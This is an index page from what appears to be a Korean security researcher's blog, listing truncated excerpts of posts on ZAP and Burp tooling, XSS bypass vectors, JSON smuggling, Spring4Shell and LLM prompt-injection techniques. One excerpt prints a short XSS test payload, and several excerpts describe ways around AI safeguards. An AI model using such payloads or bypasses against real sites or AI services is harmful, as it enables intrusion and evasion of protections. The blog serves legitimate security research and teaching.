security

Exploring OWASP Noir's PassiveScan

Hello, security enthusiasts! Today, we’re diving into the exciting new features of OWASP Noir v0.18, particularly focusing on the PassiveScan functionality. This update enhances Noir...

Automating Dead Link Detection

A dead link, or broken link, occurs when a hyperlink points to a web page that has been removed or does not exist anymore. Beyond mere inconvenience, these dead links can significant...

Hidden XSS? No User Interaction!

@kinugawamasato가 정말 멋진 페이로드를 가지고 왔습니다. 최근 글 XSS Bypass: alert_?_(45)에서 이야기 드렸듯이 요즘 XSS 벡터에 대한 리서치가 활발해지고 있는데요, 드디어 Hidden XSS에서 사용자 인터렉션을 유도할 필요가 없어졌습니다. https://x.com/kinugawamasa...

XSS Bypass: alert_?_(45)

최근 @Gareth Heyes가 또 재미있는 브라우저 엔진의 규칙을 찾고 있습니다. X 통해서 몇가지 공유됬었는데요, 그 중 일부는 XSS 테스팅에 직접적으로 쓰일 수 있어 정리하여 공유해봅니다. XSS Payloads <img src=data: onerror=alert&puncsp;(1)> <i...

Revive ZAP with a Java Swap

Recently, I encountered persistent crashes while running ZAP 2.15 on macOS. The issue seemed to stem from the bundled Java version. After some debugging and testing, I found a soluti...

Placeholder Trick for Security Testing

최근에 저는 Burpsuite, Caido, ZAP을 모두 사용하고 있습니다. 기존 환경에서 Caido가 추가되었고, 여러가지를 실험중에 있습니다. 이 실험을 진행하면서 예상대로 돌아가지 않았던 것들이 많았지만 반대로 몇가지 얻어가고 있는 것들이 있습니다. 오늘은 그 중에 제가 잘 사용하지 않았던 트릭에 대해 바뀐 생각과 내...

ZAP 2.15 Review ⚡️

ZAP 2.15가 릴리즈되었습니다. OWASP를 나오는 이슈로 인해 2.14가 빠르게 출시됬던 상태라 2.15까지의 기간 또한 짧았네요. 오늘은 2.15 버전에 대해 빠르게 리뷰해봅니다. Scripts as First Class Scan Rules 드디어 Scripts가 ActiveScanRule, PassiveScan...

Malicious code in xz/liblzma 😱

바로 어제 압축 처리를 xz 패키지의 upstream tarballs에서 악의적인 동작이 확인되어 이슈입니다. 결론은 xz 내 Malicious code가 삽입되었고 이로 인해 많은 시스템이 영향받을 것으로 보입니다. CVE-2024-3093를 할당받은 이 이슈에 대해 이야기해볼까 합니다. Xz xz는 압축 도구로 LZMA...

Smuggling with JSON

JSON은 YAML과 함께 자주 사용되는 포맷 중 하나입니다. K:V 형태의 단순한 구성이지만, JSON의 특성을 이용하면 데이터를 숨기고 Application의 잘못된 동작을 유도할 수 있습니다. 오늘은 Insignificant bytes를 이용한 JSON Smuggling 대해 알아봅니다. Insignificant w...

Preventing LLM Prompt Leak

ChatGPT는 사용자 개개인이 Bot을 만들고 서비스할 수 있도록 제공되고 있습니다. 저도 제 편의를 위해 몇가지 만들어서 사용하는데 너무나도 쉬운 방법으로 Prompt를 읽어낼 수 있었네요. 오늘은 Pre Prompt(GPT instruction)를 탈취하는 공격에 대한 방어 이야기를 해볼까 합니다. Instructi...

Prompt Injection via Ascii Art

LLM 모델을 사용하는 서비스에선 Prompt Injection과 같은 LLM Attack을 방어, 완화하기 위해 여러가지 보호 로직을 가지고 있습니다. 그리고 이를 깨기 위해서 독창적인 방식의 Prompt가 필요합니다. Ascii Art를 통한 우회 기법인 ArtPrompt를 다루는 preprint1가 공개되어 읽어보고,...

PQ3 and PQC 🗝️

Apple에서 조만간 iMessage에 PQ3라는 암호화 프로토콜을 적용할 예정이라고 발표했습니다. 개인적으로 PQC1에 관심있었고, 일적으로도 접점이 있어 종종 찾아보곤 헀었는데, 이번 PQ3에 대한 내용은 PQC를 실제로 서비스에 적용하는 경우라서 재미있게 읽었습니다. 덤으로 PQC rekeyring에 대한 내용도 있어...

DOM Handling with MutationObserver

최근 ZAP은 SPA 기반의 앱을 쉽게 식별하기 위해 Client Side Integration 이란 기능을 추가했습니다. 이 이 때 DOM의 변화를 식별하기 위한 장치로 MutationObserver가 사용되었는데요. 오늘은 MutationObserver가 뭔지 그리고 보안 테스팅 시 어떻게 사용할 수 있을지 이야기해봅니다...

Lazy-loading iframe in Firefox

최근에 Firefox쪽에서 하나 업데이트를 예고 했습니다. 곧 img 태그에만 존재하던 lazy-loading이 iframe에도 적용되는데요. 성능적인 장점은 분명히 있겠지만, img와 달리 XSS의 리스크가 높은 iframe의 로드 시점을 통제할 수 있는 형태라 재미있는 이슈가 나올지 기대되기도, 반대로 또 걱정되기도 합니...

WebAuthn과 Passkey

여러분들은 패스워드 매니저를 사용하시나요? 저는 개인적으로 Apple의 암호 기능을 주로 사용합니다. 또한 icloud+도 사용하고 있어 이메일 가리기 + 암호 조합으로 가급적 서비스별로 계정과 패스워드가 겹치지 않는 상태로 유지하고 있습니다. 구글의 경우 Google password manager를 통해 비슷하게 사용하시는...

ZAP 2.14 Review ⚡️

생각보다 엄청 빠른 주기로 ZAP 2.14 릴리즈가 발표되었습니다 🎉⚡️ 아마도 최근에 ZAP은 OWASP를 나와 별도의 브랜딩을 가진것이 큰 영향을 줬을거라 생각합니다. ZAP 2.13이 나온지 오래되지 않았기 때문에 큰 변화가 있는 것은 아니지만, 그래도 중요한 API나 기능들이 추가되서 빠르게 리뷰해봅니다. ZAP ...

XSS via reportError

reportError란 함수를 아시나요? Chrome 95, Firefox 93 버전에 추가된 글로벌 메소드로 JS의 uncaught exception을 콘솔이나 글로벌 이벤트 핸들러로 넘겨주는 기능을 수행합니다. PortSwigger 측에서 reportError 함수를 이용한 트릭을 공개했고 잠깐 시간내어 살펴본 내용 공유...

ZAP Map Local로 쉽게 Fake Response 만들기

보안 테스팅에선 HTTP Response를 자주 변경해야할 경우가 많습니다. 이럴 때 저는 보통 ZAP에선 breakpoint와 replace 기능, 그리고 스크립팅을 주로 사용했었습니다. (+Proxify의 DSL) 최근 일부 Proxy 도구나 웹 디버거에서 사용되는 Map Local 기능이 ZAP의 AddOn으로 추가됬...

Zest + YAML = ❤️

최근에 Zest 쪽의 Commit (zaproxy/zest/6d67925) 하나를 주시하고 있었습니다. 바로 Zest에서 YAML 포맷 지원에 대한 내용이였는데요. 드디어 공식 릴리즈가 이루어졌고 이제 Zest에서 YAML 포맷을 사용할 수 있게 되었습니다. What is Zest Zest는 자동화된 보안 테스팅을 위한...

ZAP’s Client Side Integration

최근에 ZAP에 재미있는 Addon이 추가됬습니다. GSoC(Google Summer of Code) 2023의 결과물로 BurpSuite의 Navigation Recorder와 비슷해보이는 기능으로 릴리즈 직후부터 틈틈히 가지고 놀아본 결과 다른 의미로 가능성이 보이는 Addon이란 생각이 들었습니다. 오늘은 바로 Cli...

XSpear Reborn: Big Changes Coming

제가 Dalfox 를 개발하기 전에 Ruby로 작성했었던 XSpear란 도구가 있었습니다. 동일하게 XSS를 테스팅하기 위한 도구였고, 현재 성능은 당연히 Dalfox쪽이 압도적으로 좋은 상태입니다. 그리고 작년부터 XSpear에 대한 Reborn 계획을 생각해 두었었는데, 최근 만들던 도구도 어느 정도 윤곽이 잡혀서 이제 ...

Customize ZAP HUD 🎮

Today, I write a post about how to use ZAP HUD in an engaging manner. While ZAP HUD may not have incredibly useful features at the moment, experimenting with it could be worthwhile s...

90-Day Certificate Validity

오늘은 구글에서 추친하는 90일의 인증서 유효기간에 대한 이야기를 하려고 합니다. 구글이 올해 3월(2023)에 Chromium Security 를 통해 공지(방향성에 대한 공지)한 이후에 아직 별다른 액션이 없긴 하지만, 한번쯤은 정리하고 미리 준비할 수 있는 것은 준비하는 것이 좋으니 글로 정리하여 남겨봅니다. Cert...

Hello Noir 👋🏼

Noir partnered with OWASP in June 2024 and has since become OWASP Noir. Consequently, I have updated some parts of this post to reflect this change. Hi all! I am excited to anno...

Optimizing ZAP and Burp with JVM

누군가가 저에게 Application Security, Pentest 등에서 가장 활발하게 사용되는 도구를 선택하라고 하면 당연히 Burpsuite와 ZAP 같은 Proxy 도구를 선택할 것 같습니다. 최근 Caido가 많이 올라오는 추세이긴 하나, 장기간 리드 역할을 수행해 온 두 도구를 따라가기엔 아직 충분한 시간이 더 ...

ZAP 2.13 Review ⚡️

예상보다 훨씬 빠른 시기에 ZAP 2.13이 릴리즈되었습니다. 보통 매년 가을, 겨울중에 릴리즈가 있었는데, 이번에는 여름에 릴리즈가 생겼네요. 변화된 부분이 크진 않아서 릴리즈 노트를 보면 대부분 알 수 있습니다. 2.13 릴리즈 직후부터 몇일 동안 살펴보고 느꼈던 점 위주로 작성해봅니다. Key Changes 릴리즈...

SSL Version을 체크하는 여러가지 방법들

여러가지 명령을 통해 ssl version 체크하는 방법들 간략하게 메모해둡니다. 개인적으로 주로 testssl.sh를 자주 사용했었는데, 쓰다보니 종종 다른 도구와 크로스 체크가 필요한 일이 있네요. 여러 도구들이 ssl version 관련 옵션은 지원하고 있으니 숙지해두면 종종 사용할 일이 있을듯 합니다 :D Tests...

MSF Pivoting X SocksProxy

최근에 MSF로 Pivoting 환경에서 테스팅이 필요한 경우가 있었습니다. 방법 자체는 어려운게 아니라 그냥 몸에 있는대로 진행하긴 했는데, 생각해보니 블로그에 정리했던 적은 없는 것 같아 간단하게 남겨봅니다. Pivoting Metasploit에서 Exploit을 통해 Session을 얻은 이후에 meterpreter ...

CVSS 4.0 Preview 살펴보기

CVSS(Common Vulnerability Scoring System)는 시스템, 소프트웨어의 취약성을 평가하기 위해 사용되는 취약성에 대한 스코어링 시스템입니다. Offensive Security 관련하여 현업에 있다면 익숙하지만 반대로 문제점도 많다고 느껴지는 그런 친구죠. 보통 CVSS2 또는 CVSS3를 많이 사용...

Attack Types in Web Fuzzing

Fuzzing은 어플리케이션을 테스트하고 보안 취약점을 찾아내기 위해서 가장 일반적으로 사용하는 기술입니다. 보통 Burpsuite의 Intruder, Turbo Intruder 또는 ZAP의 Fuzz, Caido의 Automate와 같이 Proxy 도구에서 제공하는 기능을 사용하거나 ffuf 같은 cli fuzzer를 사용...

Hack the AI Prompt 🤖

chatGPT는 출시 이후 정말 많은 것들을 바꿨습니다. 물론 실제 일에 큰 영향을 준다기 보단 여러 AI가 사람들의 많은 관심을 받게되면서 보안적인 관점에서도 충분한 고민과 기술의 발전이 오는 시기라고 생각합니다. 이전에 AI에 대한 공격은 학습 쪽에 관여하는 형태로 치우쳤다면 현재는 Prompt에 대한 테스팅과 관심도 많...

ZAP Site Tree에서 404 페이지 한번에 지우기

ZAP의 Site tree는 Burp와는 다르게 404 Not found도 보여주고 있습니다. 종종 쓸만한 정보가 되기 하지만 대체로 보기 불편한 존재입니다. ZAP에서는 공식적으로 기능을 제공해주고 있지 않기 때문에 간단하게 스크립팅하여 제거하는 것이 편리합니다. 간단하게 공유해봅니다. 이렇게 404도 Site tree...

Dalfox 2.9 Release 🌸

Hi hackers! Dalfox v2.9 has been released 🚀 In this release of Dalfox, a flag has been added to record Dalfox traffic in HAR file and Raw HTTP Req/Res, which can be checked in CLI O...

Encoding Only Your Choices, EOYC

요즘 장난감 삼아 Crystal과 Elixir로 여러가지 코드를 작성해보고 있습니다. 특히 Crystal은 Ruby와 제가 예전에 한번 소개하기도 헀고 Ruby와 거의 유사한 문법에 속도까지 갖추고 있어 개인적으로 관심이 많았던 언어입니다. 최근에 여러가지 이유로 Crystal은 주력 언어로 만들어가고 있습니다. 오늘은 Cr...

Insomnia 와 HTTPie Desktop

개인적으로 API 보안 테스팅이나 개발할 때 Insomnia란 도구를 사용합니다. (제가 예전에 한번 소개했었어요) 그리고 보통 CLI 기반으로 웹 요청을 전송할 땐 HTTPie란 도구를 굉장히 자주 사용하는데, 알고보니 HTTPie도 API 테스팅을 위한 도구인 HTTPie Desktop을 제공하고 있었습니다. 일단 첫인...

Cross handling Cookies in Zest

오늘은 Zest 스크립트에서 Headless Browser와 일반 ZAP 요청간 Cookie를 처리하는 방법에 대해 이야기하려고 합니다. Headless Browser와 ZAP 내부의 Req/Res 간에 쿠키 교환으로 여러 상황에서 웹 요청을 쉽게 처리하여 원하는 보안 테스팅, 자동화 루틴을 이어갈 수 있습니다. 아래와 같...

ZAP에서 우아하게 Cookie 기반 Auth 테스팅하기

Web의 Authorization, Permission, Access Control 테스팅 시 어떤 방법을 활용하시나요? 보통 보안 테스팅 단계에선 권한을 바꿔가며 수동으로 테스트하거나 자동화된 도구를 통한 테스팅, 또는 두개를 병행하여 테스트합니다. 그리고 자동화된 테스팅을 위해선 Burpsuite, ZAP, CLI Too...

Hello Caido 👋🏼

최근 Rust 기반의 분석도구인 Caido가 드디어 Public Beta로 전환되었습니다. 기존 Private Beta 당시 수려한 UI와 빠르다고 알려진 속도 덕분에 일부 BugBountyHunter 들에게 선택되어 사용되었고 많은 관심을 받고 있던 도구입니다. 오늘은 Caido가 어떤 도구인지, 어떻게 사용하면 좋을...

CORS Bypass via dot

Origin 헤더와 ACAO(Access-Control-Allow-Origin) 헤더는 Cross-Origin 관계에서 데이터를 전달하고 수신하기 위한 헤더로 SOP(Same-Origin Policy)를 공식적으로 우회하기 위한 헤더입니다. 일반적으로 CORS라고 통용되어 부르며, 이는 JSON Hijacking과 CSRF ...

ZAP Custom En/Decoder 만들기

ZAP의 확장성은 Scripting Engine의 파워에서 나옵니다. URL, HTML, Base64 등 테스팅 단계에선 인/디코딩을 하는 경우가 굉장히 많은데요. 이 때 사용하는 Encode/Decode/Hash 기능 또한 Scripting으로 확장할 수 있습니다. 사실 ZAP 2.10 버전(2020년 말)에 추가된 기능...

Firefox + Container + Proxy = Hack Env

여러분들은 분석하실 때 어떤 브라우저를 사용하시나요? 저는 보통 각 도구의 Embedded Browser(ZAP-Firefox/Burp-Chrome)을 주로 사용합니다. 그리고 종종 일단 Firefox로도 테스트를 즐겨합니다. 최근 Akita가 Firefox를 사용할 때 참고할만한 재미있는 tweet을 남겼습니다. 단순히 ...

Front-End Tracker로 DOM/Storage 분석하기

ZAP 팀에서 관리하는 도구들 중에 유독 관심이 가던 도구가 하나 있었습니다. 오늘은 드디어 정리를 마무리해서 블로그 글로 공유드리면서 어떻게 사용하는지, 이걸 통해 무엇을 할 수 있는지 이야기드리려고 합니다. 바로 Front-End Tracker입니다. Set-up Basic Front-End Tracker는 Jav...

Katana와 Web Crawler

ProjectDiscovery의 도구들은 항상 커뮤니티에 큰 파장을 일으킵니다. 실제로 ProjectDiscovery로 인해 CLI 기반의 테스팅이 훨씬 대중화되고, 이들의 도구는 각종 Pipeline에서의 핵심 도구가 되고 있습니다. 그리고 최근에 Katana란 도구를 출시하고 Nuclei 만큼 큰 파장을 일으키고 있는 것...

XSSHunter가 종료됩니다

Blind XSS 도구 중 가장 유명하고 많은 기능을 담았던 XSSHunter가 올해까지만 운영되고 내년부터 서비스가 종료됩니다. 기업 내부에서는 보통 별도의 BXSS Callback 서비스를 구축하거나 OAST를 사용하여 체크했겠지만, 버그바운티 유저나 외부에서 테스팅하는 경우 XSSHunter 사용 빈도가 높았던걸로 알고...

빠른 테스팅을 위한 ZAP 단축키들

ZAP에서 자주 사용하는 단축키들 정리해둡니다. 개인적으로 Tab 계통(History, Fuzz, Sites, Scripts 등)은 3키 이상 눌러야 하기 때문에 대다수가 1-2 키 구성입니다. (물론 탭들도 쉽게 적용하는 법이 있어요) 1-2 키 중 빈도수가 높은 단축키만 모았습니다. 익숙해진다면 테스팅 속도를 굉장히 많...

ZAP 2.12 Review ⚡️

드디어 ZAP 2.12 버전이 릴리즈되었습니다. 🎉👏🏼🍾 10월 중순쯤에 릴리즈 예정이였지만, 이슈로 약간 늦어졌다고 하네요. 오늘은 ZAP 2.12 버전에서 바뀐 내용들을 리뷰해보도록 하겠습니다. 그럼 시작하죠. UI UI상으론 크게 바뀐게 없습니다. 물론 자세히 살펴보면 몇몇가지 정보들이 더 추가되긴 했네요. Ne...

localStorage + getter = Prototype Pollution

오늘은 Prototype Pollution에 대한 이야기를 잠깐 하려고 합니다. 다름이 아니라 @garethheyes가 아래와 같은 내용의 트윗을 올렸었습니다. 정리하면 localStorage 에서 getter를 사용하는 경우, 즉 직접 접근해서 사용하는 경우 Prototype Pollution에 취약할 수 있다 란 이...

CSRF is dying

CSRF는 XSS, SQL Injection과 함께 웹에서 가장 대표적이 취약점 중 하나입니다. 현재까지도 종종 발견되는 취약점이지만, 업계에서는 오래전부터 서서히 죽어간다는 표현을 하고 있습니다. 제 생각해도 CSRF의 남은 수명이 길지는 않아 보이는데, 오늘은 무엇이 CSRF의 수명을 줄였는지 그리고 앞으로 어떤것들에 ...

Metasploit에서 HTTP Debug 하기

MSF를 사용하다 보면 실제로 공격 페이로드가 잘 전송되었는지 확인하고 싶을 때가 있습니다. 또 모듈을 이용해서 테스트했지만 개발자 등이 이해하기 쉽게 HTTP 요청으로 보여줘야할 때도 종종 생깁니다. 오늘은 이와 같이 Metasploit 모듈 테스트 중 HTTP 디버깅이 필요한 경우 사용할 수 있는 방법들에 대해 이야기하...

Broken link를 찾자! DeadFinder

최근에 Broken Link(Dead Link)를 쉽게 찾기 위한 도구를 하나 만들었습니다. 제 블로그의 Broken Link를 찾기 위한 목적이였지만, 가볍게라도 한번 공유하는게 좋을 것 같아서 블로그 글로 작성해봅니다. DeadFinder 입니다 :D Broken Link Broken Link는 Dead Link ...

Dalfox 2.8 Release 🚀

Hi hackers! Dalfox v2.8 has been released 🚀 There are not many added features this release. But it’s better than before, so I recommend an update :D Thank you ❤️ First, Thank you ...

OAST에 Hint를 더하다

OAST(OOB)를 통한 테스팅 방법은 몇년 사이 정말 많은 발전이 있었습니다. Burpsuite의 Collaborator를 시작으로 Project Discovery의 interactsh, ZAP의 OAST 등 여러 도구들이 나타나고 이를 기반으로 한 테스팅 방법들이 연구되자 OAST 자체가 여러 취약점을 식별할 수 있는 ...

Param Digger! Easy param mining via ZAP

올해 ZAP의 GSoC 프로젝트는 Param Mining을 하는 AddOn이 선정 되었었습니다. BurpSuite의 Param Miner를 모티브로 쉽게 Mining하는 것이 목표가 되었기에, Scripting과 Fuzzing으로만 Param Mining을 제 입장에선 매우 반가운 소식이였었죠. 어쩌다 보니 스노우볼이 커...

Hex? Imhex and Hexyl

여러분들은 어떤 Hex editor/viewer를 사용하시나요? 저는 Linux를 메인으로 사용할 떈 Ghex와 hexdump, macOS에선 hexyl와 vim(+plug)을 주로 사용합니다. 오늘은 크로스 플랫폼을 지원하는 엄청난 Hex Editor인 ImHex에 대해 소개해드리려고 합니다. 저도 이제는 ImHex와 he...

ZAP⚡️ Replacer VS Sender Script

ZAP에서 모든 요청에 새로운 헤더나 데이터를 추가하려면 어떻게 해야할까요? 보통은 Replacer 라는 기능을 이용해서 값을 변경하거나 새로 추가할 수 있습니다. 이 과정은 Burpsuite에서도 비슷하게 Match and Replace란 기능을 사용해서 진행하죠. 다만 ZAP Scripting 중 매번 발생하는...

ZAP Alert Filters로 Risk 가지고 놀기

Alert filters Alert filters는 ZAP에서 발견한 이슈(Alert)들을 쉽게 관리하기 위한 Filter 기능입니다. 지정한 조건에 따라서 Alert의 Risk Level을 조정하거나 나타나지 않게 할 수 있습니다. ZAP을 Proxy로 사용하는 경우 자주 사용되는 기능은 아니지만, DevSecOps 등 ...

간단하게 ZAP Scripting 배워보기

오늘은 ZAP Scripting을 처음 접할 때 익숙해지기 좋은 예제 두가지를 소개해볼까 합니다. 이 글을 읽어주시면, 간단한 코드 작성으로 ZAP에서 데이터를 조회하거나, 3rd party 스캔을 요청하는 방법을 얻어가실 수 있을거에요 😊 ZAP Scripting ZAP에서 Scripting은 좌측 Tree Window...

ZAP Forced User Mode!!

제가 작년부터 ZAP의 Authentication / Authorization 기능들에 대한 이야기를 많이 했었던 것 같습니다. 실제로 테스팅에도 많은 부분들을 적용하고 사용하고 있었습니다. Authentication Spidering in ZAP ZAP Script-base Authentication 등 ...

Input/Custom Vectors를 사용하여 ZAP에서 정밀하게 취약점 스캔하기 🎯

Active Scan 먼저 Active Scan에 대한 이야기를 가볍게하고 시작하겠습니다. ZAP의 Active Scan은 수집된 URL을 기반으로 지정된 패턴, 로직으로 자동화된 보안 테스팅을 하는 기능입니다. 보편적으론 사이트 전체에 대한 스캔이 많이 언급되지만, ZAP의 강점 중 하나는 원하는 HTTP Request를 ...

Zest script in CLI

ZAP의 강력한 기능인 Scripting에서 한번 더 강력하게 만들어 주는 것이 바로 Zest script입니다. JSON 기반의 스크립트로 웹 Req/Res 그리고 Headless browser에 대한 컨트롤, 마지막으로 Assertion 등 테스팅 기능을 이용해 간단한 코드로 복잡한 테스팅을 할 수 있는 스크립트입니다. ...

ZAP에서 Zest Script로 Headless 기반의 인증 자동화 처리하기

최근에 Headless 기반의 Authentication script를 만들고 있었는데 약간의 어려움이 있었습니다. 실제로 headless browser를 통해 인증 처리는 쉬우나 그 뒤에 ZAP이 이를 인지하게 하는 것이 쉽지가 않았었는데요. 문뜩 제가 예전에 Zest script를 작성할 때 Client 관련 항목을 봤던...

ZAP Active Scan 시 Progress와 Response chart 활용하기

오늘은 ZAP의 ActiveScan에서 볼 수 있는 Progress와 Response chart에 대한 이야기를 잠깐 하려고 합니다. 뭔가 크게 도움되는건 아니지만 습관적으로 제가 창에 띄어두고 있는게 바로 Scan에 대한 Progress인데요. 왜 띄우고, 어떻게 사용하는지 이야기해보죠. Context-based Scan...

ZAP Bookmarklet for Speed up

Bookmarklet Bookmarklet은 Javascript 함수를 Bookmark에 추가하여 마치 브라우저 확장 기능과 유사하게 사용하는 기법으로 간단한 생성 방법에 비해 웹에서의 불편했던 작업들을 단축시킬 수 있어서 많은 사람들이 애용하는 기술입니다. 한가지 예를들어 아래와 같은 코드를 Bookmark에 추가합시다....

PyScript와 Security 🐍🗡

최근 PyCon US 2022의 발표 중 PyScript가 공개되었습니다. PyScript는 HTML에서 Python 코드를 사용할 수 있도록 제공하는 라이브러리로 최근 엄청난 범용성과 낮은 러닝 커브를 가진 Python이 웹으로 확장하는 부분이라 관심도 많고 말도 많습니다. HMLT 내부에서 코드를 쓰는 방식이 PH...

ZAP HTTP Sessions를 통해 간편하게 세션 기반 테스팅하기

ZAP에는 HTTP Sessions라는 기능이 있습니다. 이름과 옵션에 있는 내용을 보고 세션 처리 관련된 기능이구나 생각만 했지 실제로 한번도 사용해보지 않았던 기능입니다. 오늘 놓친 기능이 있을까 싶어서 메뉴를 돌아다니던 중 발견하여 테스트해봤는데 생각보다 테스팅의 불편함을 줄여줄 수 있는 부분으로 보여서 글로 소개해드리...

CSS Transition 기반의 ontransitionend XSS

@garethheyes가 또 새로운 XSS 벡터를 만들어 왔습니다. 바로 ontransitionend 란 이벤트 핸들러인데요. 이 이벤트 핸들러는 transition, 즉 CSS의 애니메이션이 끝날 때 동작하며 동작을 위해선 해당 Element에 포커스 상태가 되어야합니다. <style> display: ...

Metasploit 데이터를 Httpx로?

오랜만에 Metasploit 관련 글을 쓰는 것 같습니다. 다름이 아니라 netpen이라는 plugin을 하나 찾았는데, 이를 이용하면 Metasploit으로 수집한 정보를 가지고 nuclei나 zap/burp 등 다른 도구와 파이프 라인으로 구성해서 사용하기 좋아보였습니다. Netpen 공식 플러그인은 아니고 wdahle...

ZAP HUNT Remix

제가 오랬동안 잘 써오던 도구가 있었습니다. 바로 HUNT인데요! 저 또한 분석하는 방법 중 Data Driven Testing을 선호하는 편이라 HUNT 스크립트를 정말 잘 쓰고 있었습니다. 그러던 중 HUNT Remix라고 하여 ZAP, Burpsuite 에서의 기존 스크립트 방식을 Addon 형태로 변경하는 작업이 있...

Context Technology로 ZAP 스캔 속도 올리기

ZAP의 Context(Scope)에는 Technology 라는 항목이 존재합니다. 이는 Context > Technology 경로에 존재하며 자세히 살펴보면 DB, Language, OS 등 여러가지 Technology 리스트와 체크박스가 존재합니다. 기본적으로 전부 체크되어 있습니다. 그럼 용도가 무엇일까요? ...

Permissions-Policy 헤더로 조금 더 안전하게 Browser API 사용하기

오늘은 Permissions-Policy(구 Feature Policy) 헤더에 대해 잠깐 이야기할까 합니다. Permissions-Policy Permissions Policy는 Feature Policy는 라고도 불리는 보안 정책 헤더이며 개발자가 다양한 브라우저 기능 및 API의 사용을 선택적으로 활성화 및 비활성화할...

Spring4Shell RCE 취약점 (CVE-2022-22965)

지난 주 Spring4Shell 취약점으로 인해 인터넷이 또 불탈 뻔 했습니다. 다행히 Log4Shell 보단 재현하기 어렵다는 문제로 무난하게 지나갔는데요. 겸사겸사 좀 늦었지만 이슈 정리해서 글로 올려볼까 합니다. Spring4Shell JDK 9버전 이상의 Spring Core에서 RCE(Remote Code Exe...

ZAP Structural Modifier

저는 취약점을 찾을 때 중요한 3가지를 뽑으라고 한다면 아마도 기술에 대한 이해, 대상에 대한 이해, 그리고 센스를 택할 것 같습니다. 물론 이외에도 중요한 요소들은 정말 많겠지만 이 3가지는 일할 때 가장 많이 느끼는 부분이였어요. 갑자기 이런 이야기를 하는건 오늘 주제가 대상에 대한 이해와 연관이 깊기 때문입니다. ZA...

Ajax Spidering 시 브라우저 엔진 별 성능 비교 🏁

ZAP의 AjaxSpider는 headless browser를 통해서 직접 브라우징하며 Spidering 하는 기능입니다. 기본적으로는 Firefox가 설정되어 있지만, 개인의 취향에 따라 Chrome, PhantomJS 등 여러가지 browser(headless or common)를 사용할 수 있습니다. 갑자기 궁금해졌습...

Security Crawl Maze와 ZAP

이번달 초 쯤이였나요? ZAP의 메인 개발자인 Simon이 이런 트윗을 남겼었습니다. Anyone able to recommend any open source tools that are good at crawling modern web apps? Out of the box rather than toolkits. Apa...

MyEnv := ZAP+Proxify+Burp

여러분들은 보안 테스팅하실 떄 어떤 도구들을 사용하시나요? 저는 ZAP을 메인으로 그리고 Burpsuite를 보조 스캐너로 사용합니다. 제가 2021년 마지막글(“나의 메인 Weapon 이야기“)에 Proxify에 대해 언급을 했었습니다. 오늘은 이 Proxify를 이용하여 제가 새로 구성하려는 분석 환경과 이유, 그리고 이...

XSS Weakness(JSON XSS) to Valid XSS

오늘은 XSS Weakness를 트리거 가능한 XSS로 바꾸는 방법에 대해 이야기하려고 합니다. 새로운 기술은 아니고 오래전부터 다들 사용하시던 트릭일텐데, 생각해보니 제가 따로 정리했던 적은 없어서 이참에 글로 남겨둘까 합니다. 그럼 시작하죠 🔥 XSS Weakness 우리는 XSS 테스트 중 Content-Type이 ...

Bye👋🏼 XSS Auditor (X-XSS-Protection)

이번 Webkit(Safari 15.4) 업데이트에는 중요한 보안 정책 변경이 있었습니다. X-XSS-Protection으로 잘 알려진 XSS Auditor가 제거됩니다. XSS Auditor는 Refelcted XSS를 완화하기 위한 디자인이자 보안 정책으로 HTML Parsing 단계에서 웹 요청이 response...

HAR(HTTP Archive format) 포맷과 앞으로의 개발 계획

오늘은 뭔가 기술적인 이야기보단, 그냥 제가 최근에 급 관심이 생긴 HAR 포맷에 대해 이야기할까 합니다. HAR HAR(HTTP Archive format)는 웹 브라우저과 웹 사이트의 interaction을 로깅하기 위한 목적으로 만들어진 JSON 기반의 포맷입니다. 이는 브라우저와 웹 서비스에서의 성능 측정 정보를 내...

System Hardening을 피해 RCE를 탐지하기 위한 OOB 방법들

여러분들은 RCE(Remote Code Execution)를 식별하기 위해 어떤 방법을 사용하고 있나요? 저는 개인적으로 OOB(Out-of-band)를 즐겨서 사용합니다. Sleep 등 time 기반도 정확 하지만, 비동기 로직이 많은 요즘 time 보단 oob가 더 정확하다고 생각이 드네요. (물론 둘 다 체크하지만요 😊...

Data URI(data:) XSS v2

제가 오래전에 Data URI XSS를 다루는 “Form action + data:를 이용한 XSS Filtering 우회 기법“란 글을 쓴 적이 있었는데요, 오늘은 조금 더 개선된 버전으로 글을 작성해볼까 합니다. Data URI XSS v2 입니다. Portswigger XSS cheatsheet 및 대다수 cheats...

URL: prefix를 이용하여 Deny-list 기반 Protocol 검증 우회하기

phithon_xg가 재미있는 트릭을 트윗에 공개했는데, 실제로 분석애서 유용하게 쓰일 수 있어 간단하게 정리해서 글로 공유드려봅니다. Bypass protocol check in Java 아래 url: 접두사가 있는 URL들은 Java URL에서 각각 http://, file:// 과 동일하게 동작합니다. url:htt...

Sequential Import Chaining을 이용한 CSS 기반 데이터 탈취

오늘은 CSS 기반의 공격 기법인 Sequential Import Chaining에 대해 이야기하려고 합니다. 자체적으로 뭔가 영향력이 있는건 아니지만, CSS를 제어할 수 있을 때 영향력을 증폭시켜줄 수 있는 방법이니 꼭 알아두고, 유용하게 사용하시길 바래요 😊 Sequential Import Chaining Sequen...

Attack Surface Detector를 이용해 소스코드에서 Endpoint 찾기

제가 일할 때 종종 사용하는 ZAP/Burp Addon이 있는데, 최근 에러가 있어서 찾다보니 제가 한번도 블로그에서 언급한적이 없었더군요. 그래서 오늘은 그 도구인 Attack surface detector에 대해 이야기할까 합니다. Attack surface detector Attack surface detecto...

곧 Chrome에서 document.domain을 설정할 수 없습니다 ⚠️

Chrome will disable modifying document.domain to relax the same-origin policy 구글에서 최근 document.domain에 대한 크롬 브라우저의 변경을 예고했습니다. 브라우저 3사는 서로 유사하게 정책을 가져가기 때문에 아마 firefox, safari도 ...

ZAP의 새로운 Networking Stack

지난 목요일 밤 ZAP Developers Groups에 simon이 한가지 내용을 공유했습니다. 바로 ZAP의 Networking Layer에 대한 이야기고, 저는 제목을 보자마자 어떤 내용인지 직감했습니다. (제가 정말 기다렸던 내용이거든요 🤩) 어떤 것을 개선하기 위해 이러한 작업이 진행되었는지, 그리고 어떻게 바...

Custom Payloads로 ZAP 스캐닝 강화 🚀

오늘은 제가 최근에 ZAP에서 약간 관심있게 보고있던 기능 하나를 소개해드릴까 합니다. 바로 Custom Payloads인데요. Fuzzer나 ZAP의 Scripting engine을 사용하지 않고 조금 더 쉽게 지정된 페이로드 기반으로 테스트를 할 수 있어서 알아두시면 보안 테스팅이나 자동화 구현에서 잘 사용하실 수 있을거...

Paragraph Separator(U+2029) XSS

